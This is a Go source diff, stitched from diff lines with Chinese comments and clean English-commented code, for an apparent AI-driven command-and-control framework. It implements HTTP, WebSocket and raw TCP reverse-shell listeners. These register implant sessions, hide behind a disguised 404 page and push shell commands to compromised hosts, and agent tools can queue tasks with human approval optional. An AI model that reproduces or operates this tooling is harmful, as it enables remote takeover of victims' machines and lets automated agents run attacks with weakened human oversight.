[]tls.Certificate{cert}, MinVersion: tls.VersionTLS12}, nil + } + l.logger.Warn("加载 TLS 证书失败,回退自签", zap.Error(err)) + } + // 自签证书:CN 用 listener 名,避免重复 + cert, err := generateSelfSignedCert(l.rec.Name) + if err != nil { + return nil, err + } + return &tls.Config{Certificates: []tls.Certificate{cert}, MinVersion: tls.VersionTLS12}, nil +} + +func generateSelfSignedCert(cn string) (tls.Certificate, error) { + priv, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader) + if err != nil { + return tls.Certificate{}, err + } + serial, _ := rand.Int(rand.Reader, big.NewInt(1<<62)) + tmpl := &x509.Certificate{ + SerialNumber: serial, + Subject: pkix.Name{CommonName: cn}, + NotBefore: time.Now().Add(-1 * time.Hour), + NotAfter: time.Now().Add(365 * 24 * time.Hour), + KeyUsage: x509.KeyUsageDigitalSignature, + ExtKeyUsage: []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth}, + IPAddresses: []net.IP{net.ParseIP("127.0.0.1")}, + DNSNames: []string{"localhost"}, + } + der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &priv.PublicKey, priv) + if err != nil { + return tls.Certificate{}, err + } + keyDER, err := x509.MarshalECPrivateKey(priv) + if err != nil { + return tls.Certificate{}, err + } + certPEM := pem.EncodeToMemory(&pem.Block{Type: "CERTIFICATE", Bytes: der}) + keyPEM := pem.EncodeToMemory(&pem.Block{Type: "EC PRIVATE KEY", Bytes: keyDER}) + return tls.X509KeyPair(certPEM, keyPEM) +} + +func base64Encode(data []byte) string { + return base64.StdEncoding.EncodeToString(data) +} + +func shortHash(s string) string { + h := sha256.Sum256([]byte(s)) + return hex.EncodeToString(h[:6]) +} + +// isPlaintextClient 判断请求是否来自明文客户端(curl oneliner 等) +// 完整 beacon 二进制会设置 Content-Type: application/octet-stream +func (l *HTTPBeaconListener) isPlaintextClient(r *http.Request) bool { + ct := r.Header.Get("Content-Type") + accept := r.Header.Get("Accept") + return strings.Contains(ct, "application/json") || + strings.Contains(accept, "application/json") || + 
// ApplyJitter returns baseSec seconds scaled by a random factor drawn
// uniformly, in whole percent steps, from [-jitterPercent, +jitterPercent].
// It is exported so other listeners and payload templates can share it.
//
//   - baseSec <= 0 yields 0.
//   - jitterPercent <= 0 yields exactly baseSec seconds.
//   - jitterPercent above 100 is clamped to 100, so the result lies in
//     [0, 2*baseSec].
//
// The scaling is done at nanosecond resolution. Converting the scaled value
// to whole seconds first would truncate every fractional second, which for
// small bases collapses the result to 0s or the unjittered value.
func ApplyJitter(baseSec, jitterPercent int) time.Duration {
	if baseSec <= 0 {
		return 0
	}
	base := time.Duration(baseSec) * time.Second
	if jitterPercent <= 0 {
		return base
	}
	if jitterPercent > 100 {
		jitterPercent = 100
	}
	delta := mrand.Intn(2*jitterPercent+1) - jitterPercent // [-j, +j]
	factor := 1.0 + float64(delta)/100.0
	return time.Duration(float64(base) * factor)
}
// ---- c2/listener_http_test.go ----

// TestHTTPBeaconListener_CheckInMatrix is an integration check of routing,
// the disguised 404 on failed authentication, and the plaintext JSON
// check-in reply.
func TestHTTPBeaconListener_CheckInMatrix(t *testing.T) {
	tmp := t.TempDir()
	dbPath := filepath.Join(tmp, "c2.sqlite")
	db, err := database.NewDB(dbPath, zap.NewNop())
	if err != nil {
		t.Fatal(err)
	}
	t.Cleanup(func() { _ = db.Close() })

	// Ask the OS for a free port, then release it for the listener to bind.
	lnPick, err := net.Listen("tcp", "127.0.0.1:0")
	if err != nil {
		t.Fatal(err)
	}
	port := lnPick.Addr().(*net.TCPAddr).Port
	_ = lnPick.Close()

	keyB64, err := GenerateAESKey()
	if err != nil {
		t.Fatal(err)
	}
	token := "test-implant-token-fixed"

	lid := "l_testhttpbeacon01"
	rec := &database.C2Listener{
		ID:            lid,
		Name:          "t",
		Type:          string(ListenerTypeHTTPBeacon),
		BindHost:      "127.0.0.1",
		BindPort:      port,
		EncryptionKey: keyB64,
		ImplantToken:  token,
		Status:        "stopped",
		ConfigJSON:    `{"beacon_check_in_path":"/check_in"}`,
		CreatedAt:     time.Now(),
	}
	if err := db.CreateC2Listener(rec); err != nil {
		t.Fatal(err)
	}

	m := NewManager(db, zap.NewNop(), filepath.Join(tmp, "c2store"))
	m.Registry().Register(string(ListenerTypeHTTPBeacon), NewHTTPBeaconListener)
	if _, err := m.StartListener(lid); err != nil {
		t.Fatal(err)
	}
	t.Cleanup(func() { _ = m.StopListener(lid) })

	base := "http://127.0.0.1:" + strconv.Itoa(port)
	client := &http.Client{Timeout: 5 * time.Second}

	// An unregistered path gets the standard library's default 404.
	t.Run("wrong_path_go_default_404", func(t *testing.T) {
		resp, err := client.Post(base+"/nope", "application/json", strings.NewReader(`{}`))
		if err != nil {
			t.Fatal(err)
		}
		defer resp.Body.Close()
		b, _ := io.ReadAll(resp.Body)
		if resp.StatusCode != http.StatusNotFound {
			t.Fatalf("status=%d body=%q", resp.StatusCode, b)
		}
		if !strings.Contains(string(b), "404") || !strings.Contains(strings.ToLower(string(b)), "not found") {
			t.Fatalf("unexpected body: %q", b)
		}
	})

	// A wrong token on a real route gets the disguised HTML 404.
	t.Run("check_in_wrong_token_disguised_html_404", func(t *testing.T) {
		req, _ := http.NewRequest(http.MethodPost, base+"/check_in", bytes.NewBufferString(`{"hostname":"h"}`))
		req.Header.Set("X-Implant-Token", "wrong-token")
		req.Header.Set("Content-Type", "application/json")
		resp, err := client.Do(req)
		if err != nil {
			t.Fatal(err)
		}
		defer resp.Body.Close()
		b, _ := io.ReadAll(resp.Body)
		if resp.StatusCode != http.StatusNotFound {
			t.Fatalf("status=%d", resp.StatusCode)
		}
		ct := resp.Header.Get("Content-Type")
		if !strings.Contains(ct, "text/html") {
			t.Fatalf("content-type=%q body=%q", ct, b)
		}
		if !strings.Contains(string(b), "404 Not Found") {
			t.Fatalf("expected disguised HTML, got: %q", b)
		}
	})

	// A valid token with a plaintext JSON body gets a plaintext JSON reply.
	t.Run("check_in_ok_plaintext_json", func(t *testing.T) {
		body := `{"hostname":"n","username":"u","os":"Linux","arch":"amd64","internal_ip":"10.0.0.1","pid":42}`
		req, _ := http.NewRequest(http.MethodPost, base+"/check_in", strings.NewReader(body))
		req.Header.Set("X-Implant-Token", token)
		req.Header.Set("Content-Type", "application/json")
		resp, err := client.Do(req)
		if err != nil {
			t.Fatal(err)
		}
		defer resp.Body.Close()
		b, _ := io.ReadAll(resp.Body)
		if resp.StatusCode != http.StatusOK {
			t.Fatalf("status=%d body=%s", resp.StatusCode, b)
		}
		var out ImplantCheckInResponse
		if err := json.Unmarshal(b, &out); err != nil {
			t.Fatalf("json: %v body=%s", err, b)
		}
		if out.SessionID == "" || out.NextSleep <= 0 {
			t.Fatalf("bad response: %+v", out)
		}
	})
}

// ---- c2/listener_tcp.go ----

// TCPReverseListener listens on a TCP port and waits for targets to connect
// back.
//
// Classic mode is a raw interactive shell, compatible with nc and
// bash -i >& /dev/tcp. A binary beacon instead sends the magic CSB1 right
// after connecting and then speaks the same AES-GCM JSON semantics as the
// HTTP beacon (framing lives in tcp_beacon_server.go).
//
// Every shell connection is registered as a c2 session under an implant
// UUID derived from the listener ID and the remote IP. Tasks are dispatched
// synchronously: the command bytes are sent and the output is read back.
type TCPReverseListener struct {
	rec     *database.C2Listener
	cfg     *ListenerConfig
	manager *Manager
	logger  *zap.Logger

	mu       sync.Mutex
	listener net.Listener
	stopCh   chan struct{}
	conns    map[string]*tcpReverseConn // session_id -> connection
	stopOnce sync.Once
}

// tcpReverseConn is the runtime state of one reverse-shell session.
type tcpReverseConn struct {
	sessionID string
	conn      net.Conn
	reader    *bufio.Reader
	writeMu   sync.Mutex // serialises writes so concurrent tasks do not interleave
	taskMode  int32      // atomic flag: 0 = idle (handleConn reads), 1 = task running (runTaskOnConn reads exclusively)
}

// NewTCPReverseListener is the factory registered under
// ListenerRegistry["tcp_reverse"].
func NewTCPReverseListener(ctx ListenerCreationCtx) (Listener, error) {
	return &TCPReverseListener{
		rec:     ctx.Listener,
		cfg:     ctx.Config,
		manager: ctx.Manager,
		logger:  ctx.Logger,
		stopCh:  make(chan struct{}),
		conns:   make(map[string]*tcpReverseConn),
	}, nil
}

// Type returns the tcp_reverse type constant.
func (l *TCPReverseListener) Type() string { return string(ListenerTypeTCPReverse) }
+ +// Start 启动 TCP 监听,accept 在独立 goroutine 中运行 +func (l *TCPReverseListener) Start() error { + addr := fmt.Sprintf("%s:%d", l.rec.BindHost, l.rec.BindPort) + ln, err := net.Listen("tcp", addr) + if err != nil { + if isAddrInUse(err) { + return ErrPortInUse + } + return err + } + l.mu.Lock() + l.listener = ln + l.mu.Unlock() + go l.acceptLoop() + go l.taskDispatcherLoop() + return nil +} + +// Stop 关闭监听 + 所有活动连接 +func (l *TCPReverseListener) Stop() error { + l.stopOnce.Do(func() { + close(l.stopCh) + }) + l.mu.Lock() + if l.listener != nil { + _ = l.listener.Close() + l.listener = nil + } + for sid, c := range l.conns { + _ = c.conn.Close() + delete(l.conns, sid) + } + l.mu.Unlock() + return nil +} + +func (l *TCPReverseListener) acceptLoop() { + for { + l.mu.Lock() + ln := l.listener + l.mu.Unlock() + if ln == nil { + return + } + conn, err := ln.Accept() + if err != nil { + select { + case <-l.stopCh: + return + default: + } + if isClosedConnErr(err) { + return + } + l.logger.Warn("tcp_reverse accept 失败", zap.Error(err)) + continue + } + go l.handleConn(conn) + } +} + +// handleConn 一个连接=一个会话:先识别二进制 TCP Beacon(魔数 CSB1),否则走经典交互式 shell。 +func (l *TCPReverseListener) handleConn(conn net.Conn) { + br := bufio.NewReader(conn) + _ = conn.SetReadDeadline(time.Now().Add(20 * time.Second)) + prefix, err := br.Peek(4) + if err == nil && len(prefix) == 4 && string(prefix) == tcpBeaconMagic { + if _, err := br.Discard(4); err != nil { + _ = conn.Close() + return + } + _ = conn.SetReadDeadline(time.Time{}) + l.handleTCPBeaconSession(conn, br) + return + } + _ = conn.SetReadDeadline(time.Time{}) + l.handleShellConn(conn, br) +} + +// handleShellConn 经典裸 TCP 反弹 shell(与 nc/bash /dev/tcp 兼容)。 +func (l *TCPReverseListener) handleShellConn(conn net.Conn, br *bufio.Reader) { + remote := conn.RemoteAddr().String() + host, _, _ := net.SplitHostPort(remote) + // 用 listener+remote_ip 生成稳定 implant_uuid,使同一来源的重连复用同一会话 + uuidSeed := fmt.Sprintf("%s|%s", l.rec.ID, host) + hash := 
sha256.Sum256([]byte(uuidSeed)) + implantUUID := hex.EncodeToString(hash[:8]) + + checkin := ImplantCheckInRequest{ + ImplantUUID: implantUUID, + Hostname: "tcp_" + host, + Username: "unknown", + OS: "unknown", + Arch: "unknown", + InternalIP: host, + SleepSeconds: 0, // 交互式不需要 sleep + JitterPercent: 0, + Metadata: map[string]interface{}{ + "transport": "tcp_reverse", + "remote": remote, + }, + } + session, err := l.manager.IngestCheckIn(l.rec.ID, checkin) + if err != nil { + l.logger.Warn("tcp_reverse 登记会话失败", zap.Error(err)) + _ = conn.Close() + return + } + + tc := &tcpReverseConn{ + sessionID: session.ID, + conn: conn, + reader: br, + } + l.mu.Lock() + if old, exists := l.conns[session.ID]; exists { + _ = old.conn.Close() + } + l.conns[session.ID] = tc + l.mu.Unlock() + + defer func() { + l.mu.Lock() + if cur, ok := l.conns[session.ID]; ok && cur == tc { + delete(l.conns, session.ID) + _ = l.manager.MarkSessionDead(session.ID) + } + l.mu.Unlock() + _ = conn.Close() + }() + + // 主循环:检测连接存活 + 读取非任务期间的 unsolicited 输出 + // 注意:必须统一使用 tc.reader 读取,避免与 runTaskOnConn 的 bufio.Reader 产生数据分裂 + buf := make([]byte, 4096) + for { + select { + case <-l.stopCh: + return + default: + } + // 任务执行中,runTaskOnConn 独占读取权,主循环暂停 + if atomic.LoadInt32(&tc.taskMode) == 1 { + time.Sleep(100 * time.Millisecond) + continue + } + _ = conn.SetReadDeadline(time.Now().Add(60 * time.Second)) + n, err := tc.reader.Read(buf) + if n > 0 { + // 收到数据也刷新心跳 + _ = l.manager.DB().TouchC2Session(session.ID, string(SessionActive), time.Now()) + if atomic.LoadInt32(&tc.taskMode) == 0 { + l.manager.publishEvent("info", "task", session.ID, "", + "stdout(unsolicited)", map[string]interface{}{ + "output": string(buf[:n]), + }) + } + } + if err != nil { + if err == io.EOF || isClosedConnErr(err) { + return + } + if ne, ok := err.(net.Error); ok && ne.Timeout() { + // 读超时 = 连接仍存活但无数据,刷新心跳防止看门狗误判 + _ = l.manager.DB().TouchC2Session(session.ID, string(SessionActive), time.Now()) + continue + } + return + } + } +} 
+ +// taskDispatcherLoop 周期扫描所有活动会话的任务队列,下发 exec/shell 类型的同步命令 +func (l *TCPReverseListener) taskDispatcherLoop() { + t := time.NewTicker(500 * time.Millisecond) + defer t.Stop() + for { + select { + case <-l.stopCh: + return + case <-t.C: + l.mu.Lock() + snapshot := make([]*tcpReverseConn, 0, len(l.conns)) + for _, c := range l.conns { + snapshot = append(snapshot, c) + } + l.mu.Unlock() + for _, c := range snapshot { + envelopes, err := l.manager.PopTasksForBeacon(c.sessionID, 5) + if err != nil || len(envelopes) == 0 { + continue + } + for _, env := range envelopes { + go l.runTaskOnConn(c, env) + } + } + } + } +} + +// runTaskOnConn 把一条 task 转成 raw shell 命令发送,通过结束标记读输出 +func (l *TCPReverseListener) runTaskOnConn(c *tcpReverseConn, env TaskEnvelope) { + startedAt := NowUnixMillis() + cmd, ok := buildTCPCommand(TaskType(env.TaskType), env.Payload) + if !ok { + l.reportTaskResult(env.TaskID, startedAt, false, "", "tcp_reverse listener 不支持该任务类型: "+env.TaskType, "", "") + return + } + + // 独占读取权:通知 handleConn 主循环暂停 + atomic.StoreInt32(&c.taskMode, 1) + defer atomic.StoreInt32(&c.taskMode, 0) + + // 等待 handleConn 循环退出读取(给 100ms 让正在进行的 Read 超时/完成) + time.Sleep(150 * time.Millisecond) + + // 排空 buffer 中残留的 bash 提示符等数据 + drainStaleData(c.reader, c.conn) + + endMark := fmt.Sprintf("__C2_DONE_%s__", env.TaskID) + wrapped := fmt.Sprintf("%s\necho %s\n", strings.TrimSpace(cmd), endMark) + c.writeMu.Lock() + _ = c.conn.SetWriteDeadline(time.Now().Add(15 * time.Second)) + if _, err := c.conn.Write([]byte(wrapped)); err != nil { + c.writeMu.Unlock() + l.reportTaskResult(env.TaskID, startedAt, false, "", "写命令失败: "+err.Error(), "", "") + return + } + c.writeMu.Unlock() + + ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second) + defer cancel() + output, err := readUntilMarker(ctx, c.reader, endMark) + if err != nil { + l.reportTaskResult(env.TaskID, startedAt, false, output, "读取结果失败: "+err.Error(), "", "") + return + } + cleaned := cleanShellOutput(output, cmd) 
+ l.reportTaskResult(env.TaskID, startedAt, true, cleaned, "", "", "") +} + +// reportTaskResult 适配 Manager.IngestTaskResult,统一报告路径 +func (l *TCPReverseListener) reportTaskResult(taskID string, startedAtMS int64, success bool, output, errMsg, blobB64, blobSuffix string) { + _ = l.manager.IngestTaskResult(TaskResultReport{ + TaskID: taskID, + Success: success, + Output: output, + Error: errMsg, + BlobBase64: blobB64, + BlobSuffix: blobSuffix, + StartedAt: startedAtMS, + EndedAt: NowUnixMillis(), + }) +} + +// buildTCPCommand 把 (TaskType + payload) 转成 raw shell 命令字符串。 +// 仅支持 TCP 反弹模式可直接执行的最简任务类型;upload/download/screenshot 这些 +// 需要二进制传输的能力建议使用 http_beacon。 +func buildTCPCommand(t TaskType, payload map[string]interface{}) (string, bool) { + switch t { + case TaskTypeExec, TaskTypeShell: + cmd, _ := payload["command"].(string) + return cmd, true + case TaskTypePwd: + return "pwd 2>/dev/null || cd", true + case TaskTypeLs: + path, _ := payload["path"].(string) + if strings.TrimSpace(path) == "" { + path = "." 
+ } + return "ls -la " + shellQuote(path), true + case TaskTypePs: + return "ps -ef 2>/dev/null || ps aux", true + case TaskTypeKillProc: + pid, _ := payload["pid"].(float64) + if pid <= 0 { + return "", false + } + return fmt.Sprintf("kill -9 %d", int(pid)), true + case TaskTypeCd: + path, _ := payload["path"].(string) + if strings.TrimSpace(path) == "" { + return "", false + } + return "cd " + shellQuote(path) + " && pwd", true + case TaskTypeExit: + return "exit 0", true + } + return "", false +} + +// readUntilMarker 从 reader 持续读,直到匹配 endMarker;返回去掉标记后的输出 +func readUntilMarker(ctx context.Context, r *bufio.Reader, marker string) (string, error) { + var sb strings.Builder + buf := make([]byte, 4096) + deadline := time.Now().Add(60 * time.Second) + for { + select { + case <-ctx.Done(): + return sb.String(), ctx.Err() + default: + } + if time.Now().After(deadline) { + return sb.String(), fmt.Errorf("timeout") + } + n, err := r.Read(buf) + if n > 0 { + sb.Write(buf[:n]) + if idx := strings.Index(sb.String(), marker); idx >= 0 { + return strings.TrimRight(sb.String()[:idx], "\r\n"), nil + } + } + if err != nil { + return sb.String(), err + } + } +} + +func shellQuote(s string) string { + return "'" + strings.ReplaceAll(s, "'", "'\\''") + "'" +} + +func isAddrInUse(err error) bool { + if err == nil { + return false + } + return strings.Contains(strings.ToLower(err.Error()), "address already in use") || + strings.Contains(strings.ToLower(err.Error()), "bind: only one usage") +} + +func isClosedConnErr(err error) bool { + if err == nil { + return false + } + es := err.Error() + return strings.Contains(es, "use of closed network connection") || + strings.Contains(es, "connection reset by peer") +} + +// drainStaleData 用短超时读取并丢弃 buffer 中残留的 shell 提示符等数据 +func drainStaleData(r *bufio.Reader, conn net.Conn) { + buf := make([]byte, 4096) + for { + _ = conn.SetReadDeadline(time.Now().Add(200 * time.Millisecond)) + n, err := r.Read(buf) + if n == 0 || err != nil { + break + } 
+ } + // 恢复较长的读超时 + _ = conn.SetReadDeadline(time.Time{}) +} + +var shellPromptRe = regexp.MustCompile(`(?m)^.*?(bash[\-\d.]*\$|[\$#%>]\s*)$`) + +// cleanShellOutput 过滤 bash 提示符行和命令回显,返回干净的命令输出 +func cleanShellOutput(raw, cmd string) string { + lines := strings.Split(raw, "\n") + var cleaned []string + cmdTrimmed := strings.TrimSpace(cmd) + echoSkipped := false + for _, line := range lines { + trimmed := strings.TrimRight(line, "\r \t") + // 跳过命令回显行(bash 会 echo 回输入的命令) + if !echoSkipped && cmdTrimmed != "" && strings.Contains(trimmed, cmdTrimmed) { + echoSkipped = true + continue + } + // 跳过纯 shell 提示符行 + if shellPromptRe.MatchString(trimmed) && len(strings.TrimSpace(shellPromptRe.ReplaceAllString(trimmed, ""))) == 0 { + continue + } + cleaned = append(cleaned, line) + } + result := strings.Join(cleaned, "\n") + return strings.TrimSpace(result) +} diff --git a/c2/listener_websocket.go b/c2/listener_websocket.go new file mode 100644 index 00000000..da7f85db --- /dev/null +++ b/c2/listener_websocket.go @@ -0,0 +1,297 @@ +package c2 + +import ( + "context" + "crypto/subtle" + "encoding/json" + "errors" + "fmt" + "net" + "net/http" + "sync" + "time" + + "cyberstrike-ai/internal/database" + + "github.com/gorilla/websocket" + "go.uber.org/zap" +) + +// WebSocketListener 提供低延迟的双向 WebSocket Beacon。 +// 与 HTTP Beacon 相比: +// - beacon 与服务端保持长连接,无需轮询,新任务可"秒到"; +// - 适合需要交互式快速响应的场景(如实时键盘 / 流式输出); +// - 协议依然走 AES-256-GCM,握手时校验 X-Implant-Token; +// - 一个 listener 仅处理一个 WS 路径(默认 /ws),但可承载多个并发 implant。 +// +// 帧协议(皆为加密后 base64 字符串走 TextMessage): +// client → server:{"type":"checkin"|"result", "data": } +// server → client:{"type":"task", "data": } 或 {"type":"sleep","data":{"sleep":N,"jitter":J}} +type WebSocketListener struct { + rec *database.C2Listener + cfg *ListenerConfig + manager *Manager + logger *zap.Logger + + srv *http.Server + upgrader websocket.Upgrader + + mu sync.Mutex + conns map[string]*wsConn // session_id → 连接 + stopped bool + stopCh chan struct{} +} + +// wsConn 
单个 WS implant 的内存状态 +type wsConn struct { + sessionID string + ws *websocket.Conn + writeMu sync.Mutex // websocket 同一连接同一时间只能一个 writer +} + +// NewWebSocketListener 工厂(注册到 ListenerRegistry["websocket"]) +func NewWebSocketListener(ctx ListenerCreationCtx) (Listener, error) { + return &WebSocketListener{ + rec: ctx.Listener, + cfg: ctx.Config, + manager: ctx.Manager, + logger: ctx.Logger, + stopCh: make(chan struct{}), + conns: make(map[string]*wsConn), + upgrader: websocket.Upgrader{ + ReadBufferSize: 4096, + WriteBufferSize: 4096, + // 允许任意 Origin(implant 不带 Origin 或随便填) + CheckOrigin: func(r *http.Request) bool { return true }, + }, + }, nil +} + +// Type 类型 +func (l *WebSocketListener) Type() string { return string(ListenerTypeWebSocket) } + +// Start 启动 HTTP server 接收 WS 升级 +func (l *WebSocketListener) Start() error { + mux := http.NewServeMux() + wsPath := l.cfg.BeaconCheckInPath + if wsPath == "" || wsPath == "/check_in" { + // websocket 默认路径单独定义,避免与 HTTP Beacon 默认路径混淆 + wsPath = "/ws" + } + mux.HandleFunc(wsPath, l.handleWS) + + addr := fmt.Sprintf("%s:%d", l.rec.BindHost, l.rec.BindPort) + ln, err := net.Listen("tcp", addr) + if err != nil { + if isAddrInUse(err) { + return ErrPortInUse + } + return err + } + l.srv = &http.Server{ + Addr: addr, + Handler: mux, + ReadHeaderTimeout: 15 * time.Second, + } + go func() { + if err := l.srv.Serve(ln); err != nil && !errors.Is(err, http.ErrServerClosed) { + l.logger.Warn("websocket Serve exited", zap.Error(err)) + } + }() + go l.taskDispatcherLoop() + return nil +} + +// Stop 优雅关闭:通知所有 WS 客户端,关闭 server +func (l *WebSocketListener) Stop() error { + l.mu.Lock() + if l.stopped { + l.mu.Unlock() + return nil + } + l.stopped = true + close(l.stopCh) + conns := make([]*wsConn, 0, len(l.conns)) + for _, c := range l.conns { + conns = append(conns, c) + } + l.conns = make(map[string]*wsConn) + l.mu.Unlock() + for _, c := range conns { + _ = c.ws.WriteControl(websocket.CloseMessage, + 
websocket.FormatCloseMessage(websocket.CloseGoingAway, "shutdown"), + time.Now().Add(time.Second)) + _ = c.ws.Close() + } + if l.srv != nil { + ctx, cancel := contextWithTimeout(5 * time.Second) + defer cancel() + _ = l.srv.Shutdown(ctx) + } + return nil +} + +func (l *WebSocketListener) handleWS(w http.ResponseWriter, r *http.Request) { + got := r.Header.Get("X-Implant-Token") + if got == "" || l.rec.ImplantToken == "" || + subtle.ConstantTimeCompare([]byte(got), []byte(l.rec.ImplantToken)) != 1 { + http.NotFound(w, r) + return + } + ws, err := l.upgrader.Upgrade(w, r, nil) + if err != nil { + l.logger.Warn("websocket 升级失败", zap.Error(err)) + return + } + go l.handleConn(ws) +} + +// handleConn 处理一个 WS 连接的完整生命周期:等待 checkin → 登记 session → 读循环 +func (l *WebSocketListener) handleConn(ws *websocket.Conn) { + ws.SetReadLimit(64 << 20) + ws.SetReadDeadline(time.Now().Add(60 * time.Second)) + ws.SetPongHandler(func(string) error { + ws.SetReadDeadline(time.Now().Add(60 * time.Second)) + return nil + }) + + // 第一帧必须是 checkin + frameType, body, err := readEncryptedFrame(ws, l.rec.EncryptionKey) + if err != nil || frameType != "checkin" { + _ = ws.Close() + return + } + var req ImplantCheckInRequest + if err := json.Unmarshal(body, &req); err != nil { + _ = ws.Close() + return + } + if req.SleepSeconds <= 0 { + req.SleepSeconds = l.cfg.DefaultSleep + } + session, err := l.manager.IngestCheckIn(l.rec.ID, req) + if err != nil { + _ = ws.Close() + return + } + conn := &wsConn{sessionID: session.ID, ws: ws} + l.mu.Lock() + l.conns[session.ID] = conn + l.mu.Unlock() + defer func() { + l.mu.Lock() + delete(l.conns, session.ID) + l.mu.Unlock() + _ = ws.Close() + _ = l.manager.MarkSessionDead(session.ID) + }() + + // 心跳 goroutine + pingTicker := time.NewTicker(20 * time.Second) + defer pingTicker.Stop() + go func() { + for { + select { + case <-l.stopCh: + return + case <-pingTicker.C: + conn.writeMu.Lock() + _ = ws.WriteControl(websocket.PingMessage, nil, 
time.Now().Add(5*time.Second)) + conn.writeMu.Unlock() + } + } + }() + + // 主读循环:处理 result 等帧 + for { + frameType, body, err := readEncryptedFrame(ws, l.rec.EncryptionKey) + if err != nil { + return + } + switch frameType { + case "result": + var report TaskResultReport + if err := json.Unmarshal(body, &report); err == nil { + _ = l.manager.IngestTaskResult(report) + } + case "checkin": + // 心跳更新:beacon 周期性送上心跳 + var hb ImplantCheckInRequest + if err := json.Unmarshal(body, &hb); err == nil { + _ = l.manager.DB().TouchC2Session(session.ID, string(SessionActive), time.Now()) + } + } + } +} + +// taskDispatcherLoop 周期扫描所有活动 WS 会话,下发任务 +func (l *WebSocketListener) taskDispatcherLoop() { + t := time.NewTicker(500 * time.Millisecond) + defer t.Stop() + for { + select { + case <-l.stopCh: + return + case <-t.C: + l.mu.Lock() + snapshot := make([]*wsConn, 0, len(l.conns)) + for _, c := range l.conns { + snapshot = append(snapshot, c) + } + l.mu.Unlock() + for _, c := range snapshot { + envelopes, err := l.manager.PopTasksForBeacon(c.sessionID, 20) + if err != nil || len(envelopes) == 0 { + continue + } + for _, env := range envelopes { + l.sendTaskFrame(c, env) + } + } + } + } +} + +func (l *WebSocketListener) sendTaskFrame(c *wsConn, env TaskEnvelope) { + frame := map[string]interface{}{"type": "task", "data": env} + body, err := json.Marshal(frame) + if err != nil { + return + } + enc, err := EncryptAESGCM(l.rec.EncryptionKey, body) + if err != nil { + return + } + c.writeMu.Lock() + defer c.writeMu.Unlock() + _ = c.ws.SetWriteDeadline(time.Now().Add(10 * time.Second)) + _ = c.ws.WriteMessage(websocket.TextMessage, []byte(enc)) +} + +// readEncryptedFrame 读一帧加密 WS 文本,返回类型和明文 data +func readEncryptedFrame(ws *websocket.Conn, key string) (string, []byte, error) { + mt, raw, err := ws.ReadMessage() + if err != nil { + return "", nil, err + } + if mt != websocket.TextMessage && mt != websocket.BinaryMessage { + return "", nil, errors.New("unexpected ws frame type") + } + 
plain, err := DecryptAESGCM(key, string(raw)) + if err != nil { + return "", nil, err + } + var env struct { + Type string `json:"type"` + Data json.RawMessage `json:"data"` + } + if err := json.Unmarshal(plain, &env); err != nil { + return "", nil, err + } + return env.Type, env.Data, nil +} + +// contextWithTimeout 简单封装,避免 listener 文件之间反复 import context +func contextWithTimeout(d time.Duration) (context.Context, context.CancelFunc) { + return context.WithTimeout(context.Background(), d) +} diff --git a/c2/manager.go b/c2/manager.go new file mode 100644 index 00000000..c6309e77 --- /dev/null +++ b/c2/manager.go @@ -0,0 +1,779 @@ +package c2 + +import ( + "context" + "encoding/json" + "errors" + "fmt" + "path/filepath" + "regexp" + "strings" + "sync" + "time" + + "cyberstrike-ai/internal/database" + + "github.com/google/uuid" + "go.uber.org/zap" +) + +// Manager 是 C2 模块对外的统一门面: +// - HTTP handler / MCP 工具 / 多代理 / 攻击链记录器 全部通过 Manager 操作 C2, +// 不直接接触 listener 实现细节,避免循环依赖; +// - 持有数据库句柄 + 事件总线 + 内存中的 listener 实例 map; +// - 启动期可调用 RestoreRunningListeners() 把 status=running 的 listener 重新拉起。 +// +// 实例化由 internal/app 负责,注入到全局 App 之后再分别交给 handler / mcp. 
type Manager struct {
	db       *database.DB
	logger   *zap.Logger
	bus      *EventBus
	registry *ListenerRegistry

	mu               sync.RWMutex
	runningListeners map[string]Listener // listener_id → listener instance that has been started
	storageDir       string              // root directory for large results (screenshots / downloads)

	hitlBridge        HITLBridge                                    // called from EnqueueTask to request approval of dangerous tasks (nil = HITL not wired)
	hitlDangerousGate func(conversationID, mcpToolName string) bool // kept consistent with the agent's human-in-the-loop decision: nil or a false result skips the bridge
	hooks             Hooks                                         // extension hooks: notify the vulnerability store and attack chain on session online / task completion
}

// MCPToolC2Task matches the MCP builtin c2_task tool name, so the HITL
// whitelist and the agent side agree on it.
const MCPToolC2Task = "c2_task"

// HITLBridge bridges "dangerous tasks" to the existing internal/handler/hitl
// approval flow. internal/app passes it in at construction time; leaving it
// unset disables HITL interception (convenient during development).
type HITLBridge interface {
	// RequestApproval blocks until a human decides; nil means approved, an
	// error means rejected or timed out.
	// ctx carries user/conversation information; callers for dangerous tasks
	// are expected to supply a timeout so the request cannot hang forever.
	RequestApproval(ctx context.Context, req HITLApprovalRequest) error
}

// HITLApprovalRequest describes a C2 operation awaiting approval.
type HITLApprovalRequest struct {
	TaskID         string
	SessionID      string
	TaskType       string
	PayloadJSON    string
	ConversationID string
	Source         string
	Reason         string
}

// Hooks lets upper layers (vulnerability management / attack chain) inject callbacks.
type Hooks struct {
	OnSessionFirstSeen func(session *database.C2Session)             // a new session came online for the first time
	OnTaskCompleted    func(task *database.C2Task, sessionID string) // a task finished (success/failed)
}

// NewManager creates a Manager. It starts no listener; call
// RestoreRunningListeners explicitly. A nil logger is replaced with a no-op
// logger and an empty storageDir defaults to "tmp/c2".
func NewManager(db *database.DB, logger *zap.Logger, storageDir string) *Manager {
	if logger == nil {
		logger = zap.NewNop()
	}
	if storageDir == "" {
		storageDir = "tmp/c2"
	}
	return &Manager{
		db:               db,
		logger:           logger,
		bus:              NewEventBus(),
		registry:         NewListenerRegistry(),
		runningListeners: make(map[string]Listener),
		storageDir:       storageDir,
	}
}

// SetHITLBridge sets the approval bridge for dangerous tasks; nil disables it.
func (m *Manager) SetHITLBridge(b HITLBridge) {
	m.mu.Lock()
	m.hitlBridge = b
	m.mu.Unlock()
}

// SetHITLDangerousGate sets the predicate deciding whether dangerous C2 tasks go through the HITL bridge; it must agree with the agent's human-in-the-loop decision (e.g. handler.HITLManager.NeedsToolApproval).
// When gate is nil, no approval is requested for dangerous tasks even if a bridge is set (same as other tools when human-in-the-loop is off).
